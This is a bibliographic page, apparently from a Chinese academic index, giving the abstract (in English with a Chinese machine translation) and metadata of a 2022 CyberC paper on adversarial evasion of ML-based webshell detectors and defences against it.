Adversarial Attack and Defense for Webshell Detection on Machine Learning Models

2022 International Conference on Cyber-Enabled Distributed Computing and Knowledge Discovery (CyberC) Pub Date : 2022-10-01 DOI:10.1109/CyberC55534.2022.00017

Q. Zhang, Lishen Chen, Qiao Yan

{"title":"Adversarial Attack and Defense for Webshell Detection on Machine Learning Models","authors":"Q. Zhang, Lishen Chen, Qiao Yan","doi":"10.1109/CyberC55534.2022.00017","DOIUrl":null,"url":null,"abstract":"Machine learning (ML) models can be used for the automated processing and analysis of source codes, thus improving the detection of webshell malware source codes, which can enhance the security of the whole network. However, despite the successes of ML-based models in webshell detection, these models lack large amounts of data for training and are vulnerable to adversarial examples. We have built a larger and more precise dataset containing 2015 manually labeled webshell malware. A detection model trained with this dataset can achieve higher detection accuracy. We have also proposed a method to generate adversarial examples for the programming language without changing its logic. The main idea of our method is to insert perturbation codes that do not modify the webshell program’s semantics, thereby creating an adversarial example that can bypass the model’s detection. This method can effectively attack the existing webshell malware ML detection models without changing the original malicious functions. Experiments have shown that our method can generate webshell malware adversarial examples that evade model detection while obtaining the model’s confidence output. To defend against such attacks, we have applied retraining and adversarial fine-tuning.","PeriodicalId":234632,"journal":{"name":"2022 International Conference on Cyber-Enabled Distributed Computing and Knowledge Discovery (CyberC)","volume":"59 1","pages":"0"},"PeriodicalIF":0.0000,"publicationDate":"2022-10-01","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":"0","resultStr":null,"platform":"Semanticscholar","paperid":null,"PeriodicalName":"2022 International Conference on Cyber-Enabled Distributed Computing and Knowledge Discovery (CyberC)","FirstCategoryId":"1085","ListUrlMain":"https://doi.org/10.1109/CyberC55534.2022.00017","RegionNum":0,"RegionCategory":null,"ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":null,"EPubDate":"","PubModel":"","JCR":"","JCRName":"","Score":null,"Total":0}

引用次数: 0

Abstract

Machine learning (ML) models can be used for the automated processing and analysis of source codes, thus improving the detection of webshell malware source codes, which can enhance the security of the whole network. However, despite the successes of ML-based models in webshell detection, these models lack large amounts of data for training and are vulnerable to adversarial examples. We have built a larger and more precise dataset containing 2015 manually labeled webshell malware. A detection model trained with this dataset can achieve higher detection accuracy. We have also proposed a method to generate adversarial examples for the programming language without changing its logic. The main idea of our method is to insert perturbation codes that do not modify the webshell program’s semantics, thereby creating an adversarial example that can bypass the model’s detection. This method can effectively attack the existing webshell malware ML detection models without changing the original malicious functions. Experiments have shown that our method can generate webshell malware adversarial examples that evade model detection while obtaining the model’s confidence output. To defend against such attacks, we have applied retraining and adversarial fine-tuning.

查看原文本刊更多论文

基于机器学习模型的Webshell检测的对抗性攻击与防御

机器学习(ML)模型可以用于源代码的自动化处理和分析，从而提高对webshell恶意软件源代码的检测，从而增强整个网络的安全性。然而，尽管基于ml的模型在webshell检测中取得了成功，但这些模型缺乏大量的训练数据，并且容易受到对抗性示例的攻击。我们已经建立了一个更大、更精确的数据集，其中包含2015个手动标记的webshell恶意软件。使用该数据集训练的检测模型可以达到更高的检测精度。我们还提出了一种在不改变编程语言逻辑的情况下生成对抗性示例的方法。我们方法的主要思想是插入不修改webshell程序语义的扰动代码，从而创建一个可以绕过模型检测的对抗性示例。该方法可以在不改变原有恶意功能的前提下，有效地攻击现有的webshell恶意软件ML检测模型。实验结果表明，该方法可以生成逃避模型检测的webshell恶意软件对抗示例，同时获得模型的置信度输出。为了防御这种攻击，我们已经应用了再训练和对抗性微调。

本文章由计算机程序翻译，如有差异，请以英文原文为准。

求助全文

约1分钟内获得全文求助全文

来源期刊

2022 International Conference on Cyber-Enabled Distributed Computing and Knowledge Discovery (CyberC)

自引率

0.00%

发文量